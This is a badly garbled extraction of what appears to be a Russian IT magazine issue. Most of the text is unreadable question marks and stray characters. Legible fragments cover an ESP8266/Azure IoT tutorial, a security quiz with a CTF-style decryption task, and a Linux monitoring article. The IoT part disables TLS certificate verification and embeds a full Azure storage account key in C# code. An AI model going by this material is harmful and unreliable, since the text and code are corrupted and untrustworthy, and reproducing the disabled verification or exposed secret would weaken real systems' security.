?� ???�???� ??????�???�?� ???�????� MQTT� (Message� Queuing� Telemetry
Transport).� ???� ?????�??� ???�????,� ???????� ???�??????� ???�????�?� ???� IoT?
??????�??.�??�??�?????�???�?��??�???燡SON.�??,�??��????�??�???�
?????�??�??�??�???�?��??�????,��??�???�?????�???�?�??�??�??�???�
??.� ??� ???�?� ???�??�?� handshake� ???�?� ??????�????� ?� IoT??????� ???�??
?????� ?????�???� ????� ???�??????,� ?� ?????� ???�?????� ???�??????� ???????�
????.� ????� ???�???,� ??� ?� ????�??� ???� ???� ??????� ?� Arduino??????�??� ??
???�???�?�??�??�?????�??.�??�??�?�??�????�?�????�???�?�???:
tls.cert.verify(false)
??�?????�???�?�??�?????�??,�??????�????�??�??�??�??.
INFO
??�??�????� ???�?????�??� ????� ???�?� ????????
?�??????�??�?????�????�?燨penSSL:
openssl爏_client�showcerts�connect�
ArduinoDemoHub.azure?devices.net:8883
????????�燦ODEMCU�?燗RDUINO營DE
??�???�???�?�??�????�???�?????�??????燬DK.�???�??????,�????�?,
??????,� ??� SDK� ?� ???� ???� ??� ?????� ???,� ???????� ???� ????�??,� ????�??
?� ?????� ???� ??????�??????.� ???�???�?� ????� ?� ???,� ???� ???�??�??� ?� ???????�
??????燗rduino營DE�??�?????�燦odeMCU.�??�?�???�??�?燗rduino營DE�???�
??�??�?��???燜ile�燩references.
???�???�?燗rduino營DE
?�???????�???�?�?�????�?????�??�????�??�???��???�?��???燗ddi?
tional燘oards燤anager燯RLs�????
http://arduino.esp8266.com/versions/2.4.0/package_esp8266com_index.
json
??�??� ???�?� ?� ????� Tools� ?� Board� xxx� ?� Boardx� Manager� ?� ????�?????
ESP8266.
??�????�???�?� ???�????�?� AzureIoTHub,� AzureIoTUtility,� AzureIoTProto?
col_MQTT.� ???�?� ????�??�?� ???�?????� ???�????�?� ?� ???�????� (????� File� ?
Examples� ?� AzureIoTProtocol_MQTT)� ???�?� ???�?� ???�??� simplesample_mqtt
???燛SP8266.�??�??�????��?????.�??�????�?�???�?�????�???�??�????
???????�??��??�?爄ot_con?gs.h.
???�???� ??� ?????� ??????�??� ??????.� ???�??????� ???�???� ?� ???�????
??�??�?,�?�???�????�燣ua,�?????�?�?????�?�??�??�??�?.
??????????�?????��?????燗ZURE
?�?????�??�??�??�??�????�?,�?�??�?????�?�??�?????�??�??��????�
???�????�??�??�??�?�????�?????�???�??�??�????�???�??�??�?營oT?
????��???�??�??��??�?�?燗zure燜unctions.��????�?????�??�??�????�
??�??�??�燗zure燭able燬torage.
INFO
????�?� ???????� ???� ??????�??????� ????????
???�????� ??� ??????� ???�??�???� ???�???�???
?�???�???�??�?��???????�?�???�??????�???�
???� ??� ???�?.� ???�?� ????� ??� ???�??�?� ???�???�
??????�?� ????�???� ????�???� ??� ????????????
????�?��???.
??�????�?,� ???� ???� ???�????� Function� App� ????�???�??�?� ???�???�?� ?� Stor?
age,� ???????� ????�????� ?????� ???�???� ???� ??????.� ????� ??� ???�????
??????�??�??�???�?,�?�???????�??�???�?�???????�?�??�???�??�??�?
??????:
???�????燬torage燼ccount
LSR????�??????� ?� ???� ?????� ??????�??� ??� ???�??� ??????� ????�??.� ??
??????�???� ???� ????�???�??�??� ???�????� ???�???�?,� ???�????�???� ?� ????�
????.
???�??�??�??�?�???????�??�??�?營oT?????��?????�???�?��??�????�
??.� ???� ???�?� ???�??� ????�?� Quick� Start� ???� ???�????� ???�???� ???�??� ???
????�??�???�?????�?�??�??.
???�????燗zure????�???��???燪uick燬tart
??�??�?�?????�?�???�?燙ustom爁unction,�??�??????�??�??�?,��??????�
??�???�??營oT燞ub�(Event燞ub).�????�??�????�???�????�???�?:
???�????�??�???�??�?????�營oT??????
??�?� Event� Hub� connection� ??� ?????� ?????�???� ????�??� ???????� (?????
new).� ?� ???� ???�?� ???�???� Event� Hub� name,� ????�?????� ???�?� ?� IoT????,
?� ????� ?� ?� Endpoints� (?????�??� ???�?)� ?� ?????� ????�?� Event� Hub?compatible
name.
??�???�??�??�?,�??�????�???�燛vent燞ub
??�??�??� ?� ????� ???�???.� ???�?????� ????�??� ??????�?� ???�??� ??� IoT?????
?�??�???�?�燭able燬torage:
#r�"Microsoft.WindowsAzure.Storage"
#r�"Newtonsoft.Json"
using燤icrosoft.Azure;�//燦amespace爁or燙loudConfigurationManager
using燤icrosoft.WindowsAzure.Storage;�//燦amespace爁or燙loudS
torageAccount
using燤icrosoft.WindowsAzure.Storage.Table;�//燦amespace爁or燭able�
storage爐ypes
using燦ewtonsoft.Json;
public爏tatic爒oid燫un(string爉yIoTHubMessage,燭raceWriter爈og)
{
var爀�燡sonConvert.DeserializeObject<EventDataEntity>(myIoTH
ubMessage);
log.Info($"C#營oT燞ub爐rigger爁unction爌rocessed燼爉essage:爗myIoTH
ubMessage}");
CloudStorageAccount爏torageAccount�燙loudStorageAccount.Parse牋牋牋�
("DefaultEndpointsProtocol=https;AccountName=iotdatademostorage;
AccountKey=JgStNcJvlQYeNsVCmpkHQUkWlZiQ7tJwAm6OCL34+lGx3XrR+0CPiY9
RoxIDA6VSvMKlOEUrVWL+KWP0qLMLrw==;EndpointSuffix=core.windows.net");
CloudTableClient爐ableClient�爏torageAccount.CreateCloudTableClient
();
CloudTable爐able�爐ableClient.GetTableReference("iottable");
table.CreateIfNotExists();
EventDataEntity爀data�爊ew燛ventDataEntity("IOTpartition",燝uid.
NewGuid().ToString());
edata.DeviceId�爀.DeviceId;
edata.IotData�爀.IotData;
TableOperation爄nsertOperation�燭ableOperation.Insert(edata);
table.Execute(insertOperation);
}
public燾lass燛ventDataEntity�燭ableEntity
{
牋爌ublic燛ventDataEntity(string爌key,爏tring爎key)
牋爗
牋牋牋爐his.PartitionKey�爌key;
牋牋牋爐his.RowKey�爎key;
牋爙
牋爌ublic燛ventDataEntity()爗爙
牋爌ublic爏tring燚eviceId爗爂et;爏et;爙
牋爌ublic爄nt營otData爗爂et;爏et;爙
}
??�?� ??� ??????� ??????�?????� ????� ???� ?� ?????�??� ???�???,� ??� ??� ??????
?????�?�???�?�??�??�????��????�??????�??�??�?��燗pp爏ettings�(????�
??� ???� ??,� ???� ?� ????�?� ???�??�????� ???�??� ???�???).� ????� ????�?� ???�???�
?????�??�?�????��??�??�??�??�?�??�??�???�?燗ccess爇eys.
???�?�??�???��??�??
????�????�???� ?????�????� ???�??� ???�?� ?� ???????� ???�???�??� ???�???
Azure燬torage燛xplorer.�??�??�??�?????燗zure燭able燬torage�?????�?�??�??,
?� Azure� Functions� ?� IoT????� ????�???�?� ????�????�??� ?????�?� ???�????�?
???�???�?,� ??� ???� ???????� ?� ?????� ?????� ????�???� ????�?� ???� ?� ???�??.
?????�?,� ???� ???????� ??� ???????�??� ???�??.� ???�??� ???:� ??� ?????�?????
??????� 1� ?????� ???�??� ???�?� 7� ???�??� ?� ?????� ?� ??� ???�??� ???�???� ?????�
??????��???�???�??�??�?.
WWW
???�??�????�?�?????�??�?????�???????�???,
???????� ???�????� ??� ????�?:� Sending� Device?to?
Cloud� (D2C)� Messages.� ???� ???� ??� ???�??� ?????�
???�??,� ?� ????�???� ???� ???�???� ????�???,� ??� ?
?????�???�?�????�??�???�?�????�??.
??????
??????
??�?????????????
??�??????��??????:
??????�?燞ACKERU
?????????�????????
lozovsky@glc.ru
???�???�?� ??� ??� ??????�?� ????� ??????�?� ??� ??????�????�
????.� ????� ??????�???�?!� ?????�?� ????�?� ????�???�???
????��?????�??�???�??�???�� ???�??�??�?�???????�
????�??� ???????�????.� ??????�???� ???,� ???� ???�????
????????�?,� ???�??�??????�??� ???�????�??� ???�???� ???
?� ???�????,� ????�????�?� ???�??????� ????�??????� ??????
?�???��??????�?��?.
IT-????????, ????? ??? ???? ???????!
???�??�???�???????�???��???�???�???�??,�????�?�?�??�???�?�???�
????�?� ?????�???�??� ?????�?,� ???????� ???�?????� ???�????� ????�???�?
????�??????.� ??� ???�?� ?????�?� ??� lozovsky@glc.ru� ?� ??� ??� ???�???�?.
???????� ?????,� ??????�??,� ??????�??� ?� ????????�??.� ??????�??� ?� ?????�?,
??????�??� ?� ?????�?,� ???� ?� ???�???� ??� ?????� ???�????�????�??� ?????�
?????,� ????�????� ?� ?????�?� ????????�?� ??� ???�?????�?� ?� ???????� ??????�
????�??�??�???.
????�?�?????�??�??�??:�??�????�??�???�?�?????,�?????�?�?�???�?
?�??�???�?�??�???�??�???�?,�?�??�?????�?�??�?,��???�?�??��???�
????�?� (????�?,� ??� ????� ??????� ???�?� ??????�?� ???,� ???� ?????�?� ???�???
????�?????�??�?,�??????�??�??�?�??????�??�???�?��?????�?????
??�?????�???�)).
??�??�?????�??????�??�???�?�?????�?�????�???�??�??�????�???�
?????,� ????�???�???� ????� ???�????,� ?� ????� ?????�??� ?????�???� ???????.
?????�?!
??????�???????
1.� ???� ?????� ????�???� ???�?� ???�???�????�?� ?????�???� ???-�
??????�??�?????�???????�?????
1.�?�??�????�???�?.
2.�?�????�???�???�?.
3.�?�???�??�??�??????�???????�????��??�????�??�??�???�?.
2.� ???�????� ??� ????�?� ???�??� ????�?????�?,� ????� ??� ???�??� ??
?�??�????�??�??�????�??
1.�??.
2.�??,�???�?�????�??�?�??�????�???�??�???.
3.�?.
3.� ??????�?� ???� ??� ???????�?????� ????� ????�??,� ???????� ???-�
????�?????��??????�??�??????�??????�??????:
1.�?�??�???�??�????�???�?????.
2.�?�??????�??�????�?????.
3.�??�??????�??????��??�??�???�?????�??.
4.� ?????� ??� ???????�?????� ????� ???�????�??� ????�???� ????-�
?????�???�??�???�?�?????????�????
1.燙hameleon.
2.燰irus.Win9x.CIH.
3.燙arberp.
5.�????�??�???�?�?????????�???�??�????�?�????�??�???-�
???��??�???�???�????�?�??�?????�??????�???�??�????�?
???�??�???
1.燩hishing.
2.燤an?in?the?Middle.
3.燤an?in?the?Endpoint.
6.��??�??�??�??�?�??�???�?�??�?��??�??�??
1.�?�???�????�??�???�?�??�?�??�???�?�??????�?.
2.�??�??�?�???�????��??�??燤an?in?the?Middle.
3.�???�??�??�?�???�????�燽rute?force燼ttack��??�??�????�??�?????�
??????�??�??�?????�??�????�??�??.
7.� ?????� ?????� DDOS-???�?� ???�???�?� ??????�?� ???�??�????�?
???�????�??�????
1.燯DP�ood.
2.燞ttp爏low爌ost.
3.燚ns燼mpli?cation�??�?.
8.�????�???????�???�?????�?�??�????
1.燙RC32.
2.燤D5.
3.燬HA?2.
9.� ?????� ????�????�????�??� ??????� ??????�???�?� ?� ???�??????
????�????
1.�?�???�??�??�??????.
2.�?�???�????.
3.�??�????�??�???.
10.�?????�?�??�??�???�??�???�???�???�?:
1.�??�??燞TTPS�??�??????�??�????�?�??�???�?????????�????.
2.燞TTPS�???�???�?????�??�?�???�????�燞TTP�??�???�??.
3.燞TTPS� ?� ???� ???�??????� ???�???�?� HTTP,� ?� ???????� ?????�???� ????�
???????� ??????�?????� ??� ????�???????� ???????�??� ???�???�?� HTTP
???�??.
?????????�??????
??�????�??� ???????� ?????�??�?� ???�????�?� ????�?� ????� ???�???� ?????�?????�??
????�????,� ???????� ???�??� ???�??.� ?????� ??� ???�????�?� ?� ????� ????� ?????�
?????� ?????�???�???�?� ?????� ??????�??� ?????�????�??� ???�??.� ??????
??�????:爄nfected.
???�???�?:�??�?�???.
??�????�?� ?????� ???�?????�??� ???�?????� ?????�????�??� ???????�??� ?� ???�?
?ag.enc.� ???�??� ????� ?????�????� ????�??�??� AES?256?ECB.� ?� ???????,
?�??�???�???�?�????�????�???�??�?� key.enc.�???�???��??,�??�?
?????�????�???�??�??燫SA�??�?????�??�??爇ey.pub.
???�???�?:�??�????�???�???爁lag.enc��??�???�???.
?????��??????
??�???�??�????�??�???�?�???�??????:爀p@smcomm.ru.
????�??� ????� ?????� ?????�??� ???�????� ???�?� ????�??�??,� ???�???�?
?????�??� ???� ???????.� ??????�???� ???????� ??� HackerU� ???�??�??� ??� ????�
??�0�????�??�??.�??�??�?????�??�???�??�???�?�??�??�????�????�
???�???� ???�?� (20� ???�???�??�??� ?????),� ?� ???�?� ?????� ???????�?� 9???????�
????� ???�?� ??� ????�???� ???�??�??� ???�????�?,� ???�?� ???????�?� ????�
???�????�?????�?燞ackerU�????�???�?�??�???�???�???�?�??�????�??�?.
????�??????� ??????�????� ??� ?????� ?????� ?????,� ??????�?� :).� ?� ???�?
????,�??�?�??�?�??�????�???�??�????�?�????�??,�??????�???�????�
??� ???�??????� ??????�???,� ??????�?� ??� HackerU� ???�???�?� ???�??�?????
???�?� ????�??�??� ???� ???�???�?� ??????�??� ???????�??� (?� ????� ???�????�
???).
?????
????????
?�???????
???�?????�??,�??�?????????�
?�????燣INUX????????
???????爀nchantner
??????
enchantner@gmail.com
??� ???�??,� ???� ?� ???�?� ???�?� ???�???�???�?� ?� ????� ?� ????�
?????� ???�????,� ??� ????� ????�????�?� ????????� ???�????
??????�??�?� ??????�??� Prometheus� ???� Zabbix,� ??� ???�??
??�?,�??�?????�???????�??�?????�???�?��?????�???�
????��??????��???�?????�?�??�??�??,�??,�?????�??
?????�???� ????�?� Linux� ?� ????�??�???� ???�???,� ???�?????
?� ?????� ???�??�???�?,� ??????� ???�????� ???????�??
?�?????�??�???.
???�???�??????�???
???� ????�?� ?????� �?????�???�� ???�???�?� ?� ?� ????� ???�?� ????�????
???????�??� ???�??�????,� ?� ????� ???� ???????� ???�?� ????�??????�?� ?� ????�
??????� ???????�??� ???�?????�??�???� ???�?????�??�?.� ??� ????,� ?� ???� ????
???� ???????�??� ????�??� ???�???,� ???????� ??� ?????�???�?,� ?� ??� ???????�
?????� ?????,� ????� ????�?????,� ?????�???� ???????�???� ???�??�????.� ????�
?????,� ????????� ???�????� ?� ????�???.� ?� ???� ??� ?????� ?????�???� ???�???�
?????�??�???�?,�??????�??�?????�???�??�??�?�??�???�??????�???
???????.
?�??,�??�????�?�????,�?�??�??�營T,�???�?????�??�???�??�??,�?�
?????� ???????� ?� ????�?� ???� ?????� ?� ?????� ???�????,� ??� ???????� ???�??�?
????????� ?????,� ???� ?� ???�????�???� ????�???.� ???� ???�??� ????�??�??�????
???�??��??�????�燝raphite/Icinga/Zabbix/Prometheus/Netdata�(???�??�???�
???�????)� ???� ???� ????�?� ???�????� ?????????,� ?� ???????� ???�?� ?????�???
???�???,�?????�??�?????��??�?�??�??.
????�???�??� ????� ???�??� ??????�?� ???�???�?:� ??� ?????�??� ????,
??� ??????�?� ??� ?????� ???�?????,� ????�??�???�???� ???� ??????�???� ????�?,
???�??�????�?,��???�?�??�??�???�??�?�?????�?爌ush�??爌ull.�?�???
????� ??� ???�???�?� ???�?� ????�?� ???�???????,� ?� ??� ??????�?� ????�??�??�?
????�???� ????� ????�?� ?� heartbeat,� ????� ??,� ?????�??,� ??� ?????�???� ????
?�??�??�??�?????�??�?�?�??�???,��??�??,��???�??�???,�??�????
?�???�???�?�???�?��??????�???�???.
???,� ?� ??� ????� ???�??�?????� ?� ???�?????�??,� ???� ???�??�????� ?????�??
???�???.� ????�?� ???�?� ??� ??????� ??????� ??????�???� ??� ????,� ???� ????�?
???�???�??��??�???.�???�?,�??????�???????�??�??�??�????�???�???�
?????� ?� ??????� ????�??� ???�???� �?�??�??�???� must� have�.� ???�??????�?
???????�????�???.
???????�??????????�?�???????
??�????�?�????�??????�??�??�??�?�??�??�???�?�?�??�??�?�??????�
??�?燣inux�???��??�??.�??�???�????�???爑ptime,�?�?�??�?�??�?????�
???� ??????� ???�???� ?� ?????�?� ???�?????� ???????�????.� ???�???� ???� ???
????�????� ??????�???� ???�?� ???� ??� ?� ????�?� ?????� ?????�?� ?????�??
???????�??:
$爑ptime
13:43爑p�ays,�23,�sers,爈oad燼verages:�01�04�01
?� ??????� ????� ???????� ???�?,� ?????� ????�???�?� ??????,� ?????� ???????�??
??????�??�????��??�???�???�?????�??,��???�?�?????�???爈oad燼verage,
??�????�????�???�??�??�??�?,��??????�??�?�???�???�?�?�??????�
????�???.� ????�?,� ????� ???� ?????�?� w,� ???????� ????�?� ??� ??� ?????� ?????�?
????�???�????�??�?????�??????�??��??,�??�??�??�?�??�??�????�
??.
??�????�??� ??� uptime� ???�?� ???�??????� ???�????� ?� /proc,� ????�?
?�????�??�??�??�????�???�?�????�????�??�???�???:
$燾at�/proc/uptime
5348365.91�72891.73
?????�??�??�??�?��??�????�?�?????�??�???�?????�?��????�?�????�
??,� ?� ???�??� ?� ?????�?� ??� ???� ???� ??????�?� �??�??�??�,� ??� ?????� ???�??
??????.
??�????�???�????�?�??�?????�?爈oad燼verage,�??�??�???�???�???�
???.�??�??�????�??�?�??�?,��???�??�??�???�????�???�???????�??�/
proc�(???�?�?�?�????,�??�???�???�???�?�??�??):
$燾at�/proc/loadavg
0.01�04�01�2177�278
??�?� ??� ???�????� ???�?� ???�?� ???????�??,� ???� ?� UNIX????�????� ???� ???�?
????�???� ????????�??� ???????�??� ???�??�??,� ???�???� ?� ???�???� ??� ??????�
????燙PU,�??�??�??�??��???�??�??�??�???�???�?�?????�?�????�?:
1� ??????,� 5� ?????� ?� 15� ?????� ?????.� ????�?,� ???�?????� ?????�?� ?� ???� ????�
?????�??�??�??�??????�??�??�??�??,�????�?????�?��??�???�??�??,
?� ???????�??� ???�??�??� ?� ???�???� ????�?,� ?� ?????� ?� ???�?????� ?????�??
???�????燩ID.�??�??�?�????�??�???
?� ???�??� ?� ???,� ???� ???� ???�?� ???� UNIX,� ??� ??� ???� Linux.� ?� ????� ???� ????�
????�?:� ????� ???�?� ?????�???�?� ?� ???�????� ???�???�?,� ????� ???�???�????�
??� ?� ???�??.� ????� ????� ?� ???�???� ????�??????,� ????� ???�?� ???�?� ????� ?
???�??,�??�????�??�0%,�???��?????�????�?��??�??�???,�???�???�
????�?燣inux�??�???�?�?�???�?�??�??�?��??�???燫UNNING,�?��??�???�
??,� ??????�????� ?� UNINTERRUPTIBLE_SLEEP,� ??� ????� ???????� ??� ???????
?�???.�??�??�??,�??�?�??�??�?�????�??�?�??�?????�??�???營/O?????�
?????,�?��?????�?�???�?�??,�?????�??�?????��???�?�???�???�????�
??營/O.�??????,��????�???�??�???,��?�??�?????�???�??????�??�????�
????????� ???� ?� ???� ???� ??????:� �??� ???�???�?� Load� Average�,� 獿oad� Average
?燣inux:�??�????�??�?�.
?????, ??????? ???
??�?�???????�??�??�????�??�?,�燣inux�???????�??????�??�??????�??
???� ?� ???�??�??,� ???� ?� ?� ??????� ???�??� ????�?� ???�????� ???�????�??� ????�
?????� ???�???� procfs� (/proc),� ?� ???�?� sysfs� (/sys).� ?� ?� ???� ??????�?
???????��???�??�??�???�??.
??�?��??,�??�???�?�??�????�??�?????�??�??�??�??燯NIX�??�??:
�??�???�???�,�?�???�??�??�??�????��????�??�?????�??�????�??
?????�????�?� ???�??� ???�???� ?????� ?????�??� ???� ???�????�??� ????,� ????�
??????�????�???�??�?????�?????�??.�??�???�?�???�???�?????��???�
?????�?燯NIX�??�??�???�?燩lan��??�??�??�??�?�???�???????��??????�
??� ?� ???�??�??�???�???� ?� ????� ???�?� ????� ????� ???�???�???� ??????� cat
?� ls,� ???�???�?� ???� ????� ???�??�???.� ????�?� ???� ?????�???� ???�????� ????�
????爌rocfs,�??????�??�?�?????�???�?�燣inux�燘SD.
??,�??���??�??�爈oad燼verage,�??�???�?�燣inux�???�???�??�????�(???
?�??�????�?????�??�??????�?????�??????????).�??�????,�????�????
/proc,�??�???�??�????,��?????�?????�??�??�??�???�??�???????�??
??????�??� ???????�??� ??� ????� ?� ?????,� ?� ??� ????�?� ??� ???�??�??.� ?????
????,�???�?�??�??�??�???�???��??�??�???�????�??�??�???�???�?????�
??�?�?????�???,�???�?�????�???�??????�??�?�?燩ID???.
?� ??????�?� ???�???� ?� /proc� ????�?????� ???� ????�?� ?� ????�?� ???�??,
?????�????�??????�??��????�??�??�??�????�??�???,�?????��???�
???� ???�??.� ?� ?????�??� ???�?� ??� ????�????�?� ?� ?????�?,� ?� ???�????�???
??????� ?????�?� ???????�??� ????� ??� ?� ??????� ?� ??????�??� ???�????� ????�
????,� ???????� ?� ????� ??� ???�?� ????� ??� ??????�?????� ???� ???�?????�??
??????�?� /dev.� ???� ?� ?????�???� /sys� ??� ???�?� ?????�??� ?????�????� ???????�
???��?�???�?�??�??�???�???�??,�?�??�????�???�?�??�???�???�???�
????�??�???�??�???�??�???�????�(??????�??爑dev,�??????��??�???�?
?????�????�?????�?�/dev�?�???�?�??????�??�?�/sys).
?� ???�?� ????� ???????�??� ??� ???� ???� ???�???�???� ?� /proc� ?� /sys� ????�?
??????,� ???,� ????� ????????� ???�?� ??� /proc,� ???�?� ???�???� ??????�??� ????�
?????�???�??� ???�?????� ???�????�?� (??????!),� ???????� ??� ???� ???
??�?????�???.
??��??�???� /run,�????�?�?.�??�??�????�??�???,�??????�??�????�
????� ?????� ??� ???�??� ?� ???�??� ??????�??�??� ???�???� ???� ???�??� ???�??�?
????????�??�?????�??????,��??�???�?爑dev�爏ystemd�(?�??�?????�??
??????�?� ????� ???�?).� ????�?,� ???� ???�??� udev� ?� 2012� ????� ????�?� ?� systemd
?�???�?�??�???�???�??�??�????.
?�????,�??�????�????�??�???,牜???�?????�??��?????�??�.
??��??�??�?�???????:燩rocfs燼nd爏ysfs�牜???�????�??�???�/proc�.
??� ???�????� ?� ?????� ???????.� ???� ????� ???�?� ????�???,� ?????� PID� ?????�
?????� ???�??�??,� ????� ?????�?� pidstat� ?� htop� (??� ????�???�???� ??????,
?????�???�??????�??�??爐op,�???�?�?????�???�??�???�???�?�??�?,�???�
???�??�????�???�??�????�?�????).
???�?�???,�????�?爐ime�??�???�?�????�???�??�???,�????�?�???�??
???�?�??�???????????,�??�??,�????�??�??�???:
$爐ime爌ython3�c�"import爐ime;爐ime.sleep(1)"
python3�c�"import爐ime;爐ime.sleep(1)"�04s爑ser�01s爏ystem��
cpu�053爐otal
???� ????� ?� ???� ???�???�??�?,� ?????� ????�????� ?????� ???�?????� ???�??
???�?�爇ernel爏pace�爑ser爏pace,�?�???�????�??�?????��???�??�???
????�???�??� ???.� ?????�?� ???� ???????� ?????�?� ??� ???� ???�?� ???�?
?� ??????�??� ???�???� ???� ???�???� ?????� ??� ?????� ???�?� ?� ????�????:� ????
???�??� ??????�???� ????�?� ????,� ??,� ????�?� ???�????,� ?????� ?� I/O,� ?� ????
???�??� ?� ??,� ???�????,� ?� ????� ????� ????�?????�?� ???????�??� ???�?,
???????�??�?�??�?????�?????�??�?????.
?� ???� ??????� ???�?,� total� time,� ???� ??� wall� clock� time� ???� real� time,� ?
???�??�?,�??????�????�?�?????�????�????�???�????��????�?�?????�
??� ??� ?????�?� ???�??�?� ???????�??.� ????�?,� user� time� ?????� ????� ????�?
????�?� real� time,� ??????� ???� ???� ???�??�???�???� ???� ???�?� ??� ????� ?????
CPU.�???�????�??�???�??��??�??,�???�????�??�???�????�????�?.
??� ?� ?????�????,� ???�?� ???�??????� ???�????� ???� ???�???� ????� ?� ???????�
???�?,�??�?�?????�?????�??�????�????�?:
$爉pstat�P燗LL�
??�?� ?????� ????�??� ??????�?� ?� ???�????� ????� ?� ???�??,� ????????� ??� ?????�
????,�??�????,�????�????�?�???�?�??�?.��??�??�?�??�??牜???????????
???��????�?�.
???????,�??��??????�????
???��????,�??��???�????�?�???�??�??�?�??�???�?�???��?�?牜?????�
????粻?�???�?�???�?�??�????��???�???�?,�???????�?,�???�??�??�??.
???�?????,�??�???�???�?��??�????,��???�???�??�??�??????�??????�
??� ?????�?� ?� ????????:� �?� ????� ???� ???�?� ???�?,� ??� ???� ???�?� ??????�.
?� ?????� ??????�?,� ???�?� ???�??�?� ???�???�???,� ???� ???�??� ???�???� ???????�
????� ????�??�?� ???�??� ???�????,� ???�??,� ???� ???�???� ???�?� ???� ???
???????�??�??�?????�??�????�??
????�?,�?�??�????�?.�??�???�?�??��??�?????,�?�?�????�??�??
?????�????�?????�?�???�???????��/proc:
$燾at�/proc/meminfo
??�???????�???�??�??�???,�?�??????�???�??�????�???�??�?�???????�
??,� ???� ???� ???� ????�?� ???� ???????�?� ?????� RAM,� ???????� ?????� ????.
?????�?�??�?�???????�?????�?????�??�??�??�??�????�?爁ree:
$爁ree�ht
????�?,� ??????� ??� ??????�?� ???????�??� ??� ???�????�?� ??� ??� /sys,� ???� ?
???�??� ??� ????�??� ??� ??????� ???� �????� ??,� ???� ??????�.� ???� ????�?
??�??????�?,��??????�?????�?,�??�??�?????��/sys��??��??�???????:
How� memory� is� represented� in� sysfs.� ????� ????�?� ?� ???�??�?� ?????�?????
?�??��?????�???�??�??�??�??.
???� ??� ?????�?,� ????� ???�???????� ????????� ?� ?????� ???�?????�????
???????�??� ??� ???�????�?,� ???� /proc/meminfo.� ???� ???�???� dmidecode
??� ????�???�???� ??????.� ???� ????�???� ?????�???�???�?� ?� BIOS� ?� ???�???�
????�???�??�?�??�????????�???�???�??.�???�?,�?�???�?�??�??�(????�
???�?� ??????� ?????�???� ??� ???� ?????�??????,� ??� ???� ???�??� ???�??� ?????�
???).
$爏udo燿midecode�?type�
????�?,� top� ?� htop,� ???� ?� ??????�??� ps� aux,� ????� ???????� ???????�??
?� ???????� ??????,� ?� ???�??� ???� ?� ????�????� ?� ASCII� ????�?� ??� ???� ?� ??
?????.�???�??.�?????.
top
htop
???�??�??�????�?�??�??�?:
? PID��???�?????�??�??�??�??
? User��???�???????,�?�?????�?�?�??????.
?� ???� ???� ???�?????� ????� ????�??�??:� Priority� ?� Niceness,� ???�??� ???�??
?� ?????� ???�??� ???�?� ???�??� +� 20.� ??� ????,� Priority� ??????�???� ????�??�??
???�????�??�??�???�??�??�?��???,�燦iceness�?????�???�??�????�????�
??????�?�???�(????�???�?�??�???�???�?�???�????).�???�????�??�???�
???� ???�???�???� ???� ??????� ???�??�?� ????�??� ???�??�????�?� ???�???,
?????�?,� ???�???�?� ??????,� ???� ???�???�??� ???�??�???� ?????�??� renice
???�?�??�?????�???????????�???�?燙PU?bound�?????�????�???�?�?????�
??�??�???.�??�??�??�??�????�???�??�???��????�?燩riority�????�??�??
rt,�?�???爎eal爐ime,牜???�???�?��??�??�?�.
????�?�??�???�??�??��?????:
? VIRT��??�????�??�?????,牜???�??�??粻???�??�?�??�?????
? RES� ?� ???�????�?� ??????�?????� ??????� (????�?,� ???�???�?� ???????�?
copy?on?write�????�???�??�???�?�(N)�??�??�???�?��???�?�??�??�?
?�????��??�?�??�??燤��???�????�?,�??�??�?�?�??�??,�??�???�
????燦*M�?????,�?????�??�??�??�???�?�?�??�?�????)?
? SHR� ?� shared� memory,� ??� ????� ??????,� ???????� ?????�????�?� ?????
??????�?????�?�??�??�??�??�??�?�??�??�??�????.
??��??�??�??????�?????�???:
? CPU%� ?� ?????�?� ???�??�??� CPU� ????� ???�????� ???�?� ?????� ????� ?????�
??�0%,�???�????�????�?�?�??�???�?�????
? MEM%��??�???�?????,�??�????�???�??�??�???
? TIME+��????�?�??�???�??�???�?????
? COMMAND��????�????�?�(????�????�+�???�??�?)�?????�?.
??�?�?�????�???�??�???�?,�???�???�?�??�?????�??!
$爒mstat�
?????�???�??�?�??????,�??�???�???�????�??�?�?????:
? r��??�??�??�???�??�??�??�?�??�??��??????
? b��??�?�??�??�??�爑ninterruptible爏leep?
? si/so��????�?�???�??�?????��??????�?????�????�?��???�/�????�
????�?�??�?.
??�?�?�???�??�????�???,�??��??�??�??�???��??�??�??�???�????
??????????? ??????
?
? �?????�?????
?????
???????? ?�???????
???�?????�??,�??�?????????�
?�????燣INUX????????
???�??????�????????�???????�?????
??�?�?�???�??�??�????�???�?????�(???�????,�??�???�??�?燗rch燣inux),
??�????�???�??�??��????�??�????�??�???� fdisk.��?�??????�??�?
???�?�??�??????�??�???�?�???�????�??�?:
$爏udo爁disk�l
????� ??� ?????� ???�????�??� ???�??� ?� ????�????�????�??� ????????�??,
??????�???燾fdisk,��??�?�??�???�??�??,�??????,�?�??�??�?????,�????�
??� ????�?� ???????� ????� ?� ???�???�?� ?????????� ???�?????� ??� ???�??.
???� parted� (?� ??????�?,� ????�?,� ????� ???�????� GUI� ??� GTK� ?� ????� gparted)
?� gdisk.� ???????� ??????� ??????�?� ???�???� ?� ???,� ???� ?????�??�?� ???�???�?
????�????� ?????�?????�????� ???�????� ??� ???�?,� ?� ????�????�?� ???� ???�??
????�????� ??????�???????� ???�??� ????�????.� ?????�???� ??� ???� ?????�??
?????� ?????�????�?,� ???� MBR� ?� GPT.� ?� ??� ????� ???�????� ????�??�?????�?
??� ???�???�?,� ??� ????????� ???�?,� ???�????,� ?� ??????� �???�????� ?????�??
???�????� GPT� ?� MBR�.� ???� ???� ???????�???� ?� ???????� ???�???�?� Windows,
??� ????� ??� ???�?� ??� ????�???.� ?� ??,� ?� ???�????�??� ??� ????� fdisk� ???� ???�?
????????��??�??�???�???�?,�??�爌arted,�????�?�???????�??�?�?????�
??????�?�?�??�??�???�????�??.
??� ???�????� ?� ???�?� ???????�??.� ??� ???�?,� ?????� ?� ???� ???�???,
?� ??????� ?????� ?????�??� ??� ??????� ???�????� ???�???,� ???�??,� ???� ????
????�?????�?:
$燿f�h
???��???�?,�h�??�???�???�?牜??????�??�??粻?????�??�????.�?��??�?
???�???,�??�???�??�??��??�??�?�??�??????�????�??燿u:
$燿u�h�/path/to/folder
??�??�???� ?????� ??????�??� ???�??� ??????�?:� �?� ???� ??� ??????�???,
???� ????� ?????�???� ???�?,� ?????� ????� ???�????�.� ???�?,� ?????� ????�????
????�??�?,�??�??�?????��??�????�??:
$爄ostat�xz�
???�????�?�??????�???�??�??�????�??????�??�??�????�??�?????????
???�???�???�??�?????�??��??�???,�???????�??????�??�??��????�?.
???� ????�?� �????�??粻 ???????�?,� ?????�?� ????� ???� ????� ?????�?
